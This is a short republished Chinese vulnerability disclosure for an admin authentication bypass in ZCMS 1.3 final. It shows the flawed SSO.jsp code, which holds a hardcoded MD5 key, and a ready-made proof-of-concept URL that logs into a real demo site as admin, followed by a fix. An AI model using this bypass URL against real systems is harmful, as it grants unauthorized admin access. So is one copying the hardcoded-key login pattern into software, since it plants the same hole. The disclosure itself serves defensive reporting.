好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

ZCMS 1.3 final后台验证绕过漏洞及修复方案 - 网站安

简要描述: SSO.jsp 文件逻辑错误 详细说明: SSO.jsp文件逻辑错误 <%

 String username = request.getParameter("u");

 String time = request.getParameter("t");

 String str = request.getParameter("s");

 String key = "WIU%&*DJAJKL%^*W(DLJIST";

        String s = StringUtil.md5Hex(username + time + key);

 if (s.equals(str)) {

  Login.ssoLogin(request, response, username);

 }

%> 漏洞证明: http://www.zving.com/demo/SSO.jsp?u=admin&t=1&s=ff1168b33fe9e33841bb9814c58a098d 修复方案: 删除 漏洞 文件

漏洞作者:  tnt1200

查看更多关于ZCMS 1.3 final后台验证绕过漏洞及修复方案 - 网站安的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11468
  阅读:54次

上一篇: 短名突破可执行文件上传限制 - 网站安全 - 自学

下一篇:VELOCITY本地代码执行漏洞 - 网站安全 - 自学php

相关资讯